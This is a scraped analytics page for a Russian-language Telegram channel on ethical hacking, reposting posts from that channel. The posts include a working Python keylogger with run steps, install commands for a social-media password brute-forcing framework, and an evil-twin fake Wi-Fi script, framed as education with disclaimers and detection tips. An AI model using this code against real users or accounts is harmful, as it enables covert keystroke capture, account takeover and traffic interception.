CodeGuard: PySec Edition
关闭频道
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
显示更多📈 Telegram 频道 CodeGuard: PySec Edition 的分析概览
频道 CodeGuard: PySec Edition 是活跃参与者。目前社区聚集了 14 254 名订阅者,在 技术与应用 类别中位列第 8 713,并在 俄罗斯 地区排名第 45 538 位。
📊 受众指标与增长动态
自 невідомо 创建以来,项目保持高速增长,吸引了 14 254 名订阅者。
根据 30 九月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 898,过去 24 小时变化为 19,整体触达仍然可观。
- 认证状态: 未认证
- 互动率 (ER): 平均受众互动率为 9.79%。内容发布后 24 小时内通常能获得 5.46% 的反应,占订阅者总量。
- 帖子覆盖: 每篇帖子平均可获得 1 390 次浏览,首日通常累积 775 次浏览。
- 互动与反馈: 受众积极参与,单帖平均反应数为 5。
- 主题关注点: 内容集中在 codeguard, pysec, docker, grep, контейнер 等核心主题上。
📝 描述与内容策略
作者将该频道定位为表达主观观点的平台:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
凭借高频更新(最新数据采集于 02 十月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。
14 254
订阅者
+1924 小时
+1667 天
+89830 天
帖子存档
14 247
📚 Лаборатория Хакера. Автор: С.А. Бабин Год издательства: 2018«Понимание безопасности начинается с понимания атак» Если ты хочешь посмотреть на ИБ глазами злоумышленника — эта книга станет твоим личным лабораторным практикумом. Она не просто рассказывает о методах хакерства — она учит думать как хакер. Что внутри? 🗣Перехват паролей и анализ сетевого трафика 🗣Взлом Wi-Fi: от теории до рабочего ключа 🗣Действия после проникновения в локальную сеть 🗣Шифрование, инкогнито в интернете и работа с прокси 🗣Хакинг на смартфоне — потому что безопасность мобильных систем тоже важна 🗣Работа с радужными таблицами и взлом Active Directory 📌Подходит: - Начинающим энтузиастам кибербезопасности - Студентам и старшеклассникам с интересом к IT - Тем, кто хочет почувствовать уязвимости, а не просто прочитать про них Все примеры подробно и понятно — каждый шаг объяснён так, что даже новичок разберётся. 📲Бери книгу → [Code Guard: Archive] 😈 CodeGuard | #book #infosec #hacking #cybersecurity
14 247
Создание простого логгера клавиатуры (для обучения)
Как работают keylogger'ы? — сегодня разберём, как создать простой логгер нажатий клавиш с помощью Python.
💻 Keylogger - это программа, которая записывает все нажатия на клавиатуре.
Иногда используется злоумышленниками, но также может быть полезен для анализа пользовательского поведения или в игровых движках.
🛠 Пример: логгер клавиатуры на Python
from pynput import keyboard # Библиотека для перехвата событий клавиатуры
# Путь к файлу, в который будут записываться нажатия
LOG_FILE = "key_log.txt"
def on_press(key):
"""
Функция вызывается каждый раз при нажатии клавиши.
Принимает объект key, представляющий нажатую клавишу.
"""
try:
# Пытаемся получить обычный символ (например, 'a', 'b', '1' и т.д.)
with open(LOG_FILE, "a", encoding="utf-8") as f:
f.write(f"{key.char}")
except AttributeError:
# Если это не обычный символ (например, пробел, Enter, Shift и т.п.)
if key == keyboard.Key.space:
# Записываем пробел
with open(LOG_FILE, "a", encoding="utf-8") as f:
f.write(" ")
elif key == keyboard.Key.enter:
# Записываем переход на новую строку
with open(LOG_FILE, "a", encoding="utf-8") as f:
f.write("\n")
else:
# Для всех остальных специальных клавиш — записываем их имя в квадратных скобках
with open(LOG_FILE, "a", encoding="utf-8") as f:
f.write(f" [{key}] ")
def start_logger():
"""Запускает логгер и ожидает нажатий клавиш."""
print("[+] Логгер запущен. Нажмите ESC для выхода.")
# Создаём слушатель клавиатуры
with keyboard.Listener(on_press=on_press) as listener:
listener.join() # Ждём завершения работы (нажатие ESC)
# Точка входа в программу
if __name__ == "__main__":
start_logger()
✅ Как использовать?
1. Установи библиотеку pynput:
pip install pynput
2. Сохрани код как keylogger.py
3. Запусти:
python keylogger.py
4. Нажимай клавиши — всё будет записываться в файл key_log.txt.
🔍 Что делает этот скрипт?
- Слушает нажатия клавиш через pynput
- Обрабатывает специальные символы (Enter, Space)
- Сохраняет данные в текстовый файл
📌 Важно!
- Это локальный логгер, он работает только если вы его запустите
- Он не отправляет данные куда-либо
- Не используйте без ведома пользователя
- Для защиты от таких программ — следите за процессами и сетевым трафиком
🧠 Как обнаружить такой логгер?
- Смотрите список запущенных процессов
- Проверяйте подозрительные сетевые соединения
- Используйте антивирусы и EDR-решения
⚠️ Этот пример только для обучения, не для злонамеренного использования. Используйте только в тестовой среде или на своём ПК.
Полный код [Архив]
📌 Вывод
Keylogger — это не магия, а всего лишь перехват событий ввода.
Понимание того, как они работают, помогает лучше защищаться от реальных угроз.
😈 CodeGuard | #python #ethicalhacking #практика14 247
⚙️ Нашли для вас самый крутой блог senior python-программиста
На своëм канале он уже осветил такие темы, как:
— Почему твой Python-код медленный?
— Walrus-оператор в Python
— Почему нужно писать is None, а не == None?
— Почему or в Python работает не так, как ты думаешь?
— Почему нельзя использовать изменяемые значения по умолчанию?
👀Подписывайся, чтобы не потерять
14 247
🧩Типизация в Python: как аннотации спасают ваш код и ускоряют разработку
💻 Сегодня: интересное из мира Python
Привет, участникам CodeGuard!
Python - язык с динамической типизацией. Хорошо это или плохо? С одной стороны, это скорость разработки: не нужно объявлять и запоминать типы переменных. С другой, это ошибки, которые всплывают при запуске или... через месяц продакшена.В этой статье я покажу, почему type hinting - инструмент, который сэкономит часы отладки и сделает код безопаснее.
Аннотации типов впервые были представлены в Python 3.5, который появился в 2015 году. Но до сих пор многие разработчики продолжают писать код в старом стиле. Давайте разберемся, как правильно писать код и что для этого нужно!
🙂 Ссылка на статью внутри
😈 CodeGuard | #python
14 247
🚨 SocialBox-Termux: фреймворк для брутфорса в соцсетях
⚠️ Информация представлена исключительно в образовательных целях. Никогда не используйте инструменты взлома без прямого разрешения владельца системы.
SocialBox-Termux — это мощный фреймворк для тестирования безопасности аккаунтов методом подбора паролей.
Поддерживает: Facebook, Gmail, Instagram, Twitter
Создан Белахсаном Оуэрги, доработан и адаптирован samsesh для мобильного использования через Termux.
🛠 Установка:
apt-get update
apt-get install git
git clone https://github.com/samsesh/SocialBox-Termux.git
cd SocialBox-Termux
chmod +x install-sb.sh
./install-sb.sh
▶️ Запуск:
./SocialBox.sh
🔡 Протестировано:
- Termux (Android)
- Работает с Tor (рекомендуется использовать VPN)
Этот инструмент — отличный пример того, как простые атаки могут быть эффективны. Используйте его, чтобы понять уязвимости, а не причинить вред.
🔗 GitHub
😈 CodeGuard | #osint #hacking #tool14 247
🛠 Автоматизация Telegram-канала с помощью ChatGPT и Aiogram — просто о сложном
✨ Полезный сниппет дня
Привет, участникам CodeGuard! Сегодня я расскажу: Как можно автоматизировать ведение своего ТГ канала с помощью ИИ.
На мой взгляд тема довольно свежая и интересная, а что самое главное полезная. Статья по большей мере ориентирована на новичков у которых имеются базовые знания python, но это не означает что другим она не будет интересна. Итак, начнем!
🙂 Ссылка на статью внутри
😈 CodeGuard | #python
14 247
🧪 Turbo-Attack — генератор рандомного сетевого трафика для пентестов
Turbo-Attack — это мощный инструмент для генерации искусственного сетевого трафика с максимально возможной энтропией: случайные MAC-адреса, IP, последовательности пакетов и выбор портов. Всё — нацелено на конкретный IP, идеально для стресс-тестов, эмуляции атак и анализа поведения IDS/IPS-систем.Инструмент заточен под Linux: работает на Kali, Debian, ARM64 и AMD64, с поддержкой IPv4 и IPv6. С его помощью можно имитировать поток "живого" трафика — миллионы пакетов, будто целая ботнета решила навестить твой сервер. Полезен для тестирования сетевых систем, фейковых активностей и нагрузочных сценариев. 📱 GitHub 😈 CodeGuard | #security #hack
14 247
🧠 SOAP, WSDL и немножко Python создаём веб-сервис шаг за шагом
✅ Эффективно и быстро
Практика — лучший способ глубокого понимания теории. Рассмотрим на примере, как работают веб-сервисы с протоколом SOAP, для чего нужен WSDL и как он связан с XML-документом в теле POST-запроса.
REST (Representational State Transfer) — это архитектурный стиль, основанный на HTTP-протоколе, который используется для разработки приложений с фронтендом или интеграционными потоками. REST не предусматривает строгих стандартов использования типовых HTTP-методов, а лишь описывает рекомендации, которым должны следовать проектируемые сервисы API. Одной из ключевых особенностей REST API является представление данных в виде набора ресурсов, каждый из которых имеет свой уникальный унифицированный идентификатор (URI). SOAP (Simple Object Access Protocol) — это протокол обмена сообщениями в формате XML, основанный на технологии удалённого вызова процедур. Он работает через различные протоколы передачи данных (HTTP, SMTP, TCP, UDP). Данный протокол представляет собой более строгий и формализованный подход к обмену данными, что делает его похожим на детально проработанное соглашение, практически исключающее вероятность ошибок в работе.🔑Читать полностью на Хабре 😈 CodeGuard | #python
14 247
🔐 ТОП-5 Шпаргалок и ресурсов для хакеров и специалистов по кибербезопасности
Если вы начинающий или опытный специалист в сфере безопасности — эти ресурсы помогут вам поднять навыки на новый уровень.
📌 Все они доступны бесплатно и регулярно обновляются сообществом.
1️⃣ Awesome Hacking Resources
Сборник инструментов, курсов, CTF, YouTube-каналов и многого другого для обучения и практики.
🔗[GitHub]
2️⃣ OWASP Cheat Sheet Series
Серия шпаргалок по безопасности веб-приложений. Отличный справочник по основным аспектам защиты от OWASP Top 10.
🔗[GitHub]
3️⃣ Pentest Cheat Sheet
Полезные команды и советы для тестирования на проникновение: от разведки до эксплуатации уязвимостей.
🔗 [GitHub]
4️⃣ Kali Linux Cheat Sheet
Основные команды и инструменты популярного дистрибутива Kali Linux для пентеста и анализа безопасности.
🔗 [GitHub]
5️⃣ Nmap Cheat Sheet
Универсальный гайд по Nmap — лучшему инструменту для сканирования сетей и портов.
🔗 [GitHub]
😈 CodeGuard | #хакинг #pentest
14 247
⭐️ Действительно ли наши устройства слушают нас?
Вы когда-нибудь замечали странное совпадение: просто упомянули вслух, что хотите купить новую беговую дорожку, а спустя час ваш телефон вдруг выдает баннер с рекламой спорттоваров? Для многих это — пугающая загадка. Мы начинаем подозревать, что нас повсюду «прослушивают»: смартфоны, смарт-колонки, телевизоры, ноутбуки, «умные» холодильники...
В этом посте мы разберемся, действительно ли наши устройства ведут непрерывную аудиоразведку, чтобы «кормить» нас прицельной рекламой, или же всё можно списать на мощные алгоритмы анализа данных (которые, к слову, тоже знают о нас очень многое). Также вы узнаете, откуда именно нас могут «слушать»: рассмотрим смартфоны, смарт-колонки, Smart TV и даже «умные» пылесосы.🔝 Подробнее 😈 CodeGuard
14 247
🛠 Sn1per — автоматизация пентеста нового поколения
Sn1per — это мощный автоматизированный инструмент разведки и тестирования на проникновение (pentesting) . Он объединяет лучшие открытые методики и инструменты в единую систему, которая помогает обнаруживать скрытые активы и потенциальные точки входа для злоумышленников.
🌡 Для чего?
⏺ Интеграция с популярными сканерами :
Nuclei, Nikto, DirBuster, GoBuster, Metasploit, OpenVAS, Nessus и другие — всё работает в связке.
⏺Автоматизация рутинных задач :
От сбора информации до финального отчёта — Sn1per берёт на себя самое сложное.
⏺ Поддержка CVE и новых уязвимостей :
Сканирует среду на наличие актуальных уязвимостей из последних баз CVE.
⏺ Глубокий анализ инфраструктуры :
Находит скрытые поддомены, незащищённые сервисы, открытые порты и многое другое.
⏺ Рейтинг угроз :
Помогает понять, что критично, а что можно отложить.
🔗 GitHub Sn1per
😈 CodeGuard | #security #osint
14 247
🐍NoDPI4Android. Решаем проблему «деградации» YouTube теперь и на Android
💪 Изучаем детали:
NoDPI4Android — это графическая надстройка над NoDPI
NoDPI представляет собой асинхронный прокси-сервер на базе библиотеки asyncio Он перехватывает tls-рукопожатия (handshake) исходящих соединений и отправляет их на фрагментацию. Если домен присутствует в списке заблоченных, программа разбивает пэйлоад на несколько кусков случайного количества и случайной длины, и склеивает с байтовой последовательностью \x16\x03\x04 (+ data). Т. е. одна tls запись превращается в несколько записей разной длины. После этого они объединяются и отправляются как один пакет. Пока у DPI нет мощностей, чтобы разбираться с таким хаосом в пакетах, и все это благополучно следует к пункту назначения, а мы, довольные, например, смотрим YouTube.
😎 Можно глянуть позже
😈 CodeGuard | #python
14 247
🐧 Библия Linux Автор: Кристофер Негус Год: 2020 (оригинал) / 2022 (русский перевод)💯 🔐 "Linux — не просто ОС. Это искусство управления системой с минимальным количеством GUI и максимальной свободой." ✅ Читай. Разбирайся. И да — забудь про «как это работает», теперь ты знаешь почему. Если ты хочешь разобраться в Linux по-настоящему глубоко , эта книга — твой проводник. Она охватывает всё: от установки системы и базовых команд до контейнеров, облачных вычислений и безопасности. С помощью этой книги ты: 🗣Прокачаешь навыки от новичка до уровня pro 🗣Разберёшься в контейнерах, Kubernetes и OpenShift как свой карман 🗣Настроишь безопасность системы так, что SELinux будет гордиться 🗣Понимашь, зачем нужны systemd, PAM, CUPS и как без них не зависнуть 📖 Бери книгу → [Архив] 👍 - хочу больше таких технических книг 🥴 - линукс — это не моё, я на Windows 😈 CodeGuard | #book #linux
14 247
🔝 Я вам заявляю, с Linux мы доигрались: теперь точно знаем, как начать в нём карьеру
⭐ Серверные фишки
Привет, участникам CodeGuard! Меня зовут Евгений Никулин, я – руководитель инженеров эксплуатации в К2 Cloud.
Пару месяцев назад меня позвали на онлайн-митап «Карьера в Линукс» – обсудить, как сейчас всё устроено: какие подходы используют компании, каких специалистов ценят и что помогает соискателям находить общий язык с работодателями.
Решил с вами поделиться самым важным оттуда. Полная запись, если что, есть на канале, ссылка ниже 👇
📱 Видос на YouTube
😈 CodeGuard | #linux
14 247
🛠 AutoCraft Bot — Telegram-автоматизация Windows без монитора, глазами разработчика
🪄 Как сделать проще?
Привет, участникам CodeGuard!
Сегодня поделюсь с Вами новым инструменты для автоматизации, системного мониторинга и просто стриптом, который делает жизнь за компьютером удобной.
Проект называется AutoCraft Bot. Это гибрид: Telegram-бот и десктопное приложение на Python. Он управляет компьютером, запускает плагины, делает скриншоты, работает с голосом, поддерживает REPL и Telegram API — и всё это в виде одного «.exe» файла.📱 GitHub: github.com/andreykadelite/AutoCraft-Bot 😈 CodeGuard | #python
14 247
⚙️ Как создать фейковый Wi-Fi (или проверить свой)
Вы когда-нибудь подключались к незнакомой точке доступа в кафе или отеле?
А задумывались ли вы, что рядом может быть фейковая точка доступа, которая пытается перехватить ваш трафик?
Сегодня расскажем, как работает атака типа "evil twin" (злой близнец), и как с помощью Python можно:
- Создать фейковую сеть ( в учебных целях 😅)
- Проверить, нет ли поблизости подозрительных сетей
💡 Что такое "evil twin"?
Это атака, при которой злоумышленник создаёт точку доступа с таким же именем (SSID), как у реальной сети.
Пользователь подключается к ней, думая, что всё в порядке, а злоумышленник получает доступ к его трафику.
🛠 Как это сделать на Python?
К сожалению, создание полноценной точки доступа требует специального оборудования и драйверов (например,
hostapd на Linux).
Но мы можем имитировать наличие фейковой сети, чтобы проверить, как реагирует ваше устройство.
import os
import subprocess
import time
def start_fake_ap(ssid="Free WiFi", channel="6"):
print(f"[+] Запуск фейковой сети: {ssid} (канал {channel})")
try:
# Имитация точки доступа через команду airbase-ng (из aircrack-ng suite)
subprocess.run([
"airbase-ng", "--essid", ssid, "-c", channel, "wlan0"
])
except KeyboardInterrupt:
print("\n[!] Остановка...")
subprocess.run(["airmon-ng", "stop", "at0"])
time.sleep(2)
subprocess.run(["service", "network-manager", "restart"])
print("[✓] Восстановлена сеть")
if __name__ == "__main__":
start_fake_ap()
🔍 Как обнаружить фейковую сеть?
Если ты хочешь просто проверить окружение, можно использовать сканирование сетей:
import subprocess
def scan_wifi():
result = subprocess.check_output(["iwlist", "wlan0", "scan"])
networks = result.decode("utf-8").split("Cell")
for net in networks[1:]:
if "ESSID" in net:
essid = net.split('ESSID:"')[1].split('"')[0]
print(f"[+] Найдена сеть: {essid}")
if __name__ == "__main__":
scan_wifi()
✅ Зачем может пригодиться?
- Чтобы научиться распознавать потенциальные угрозы
- Чтобы лучше понимать работу беспроводных сетей
- Чтобы защитить себя и других от простых атак
Полный код 👉 [Архив]
📌 Вывод
Фейковые Wi-Fi точки — не голливудская фантастика, а реальная опасность.
Знание того, как они работают, помогает лучше защищать себя и повышает уровень осведомлённости.
Хочешь продолжение?
Напиши в комментарии тему - постараюсь рассказать👇
😈 CodeGuard | #ethicalhacking #практика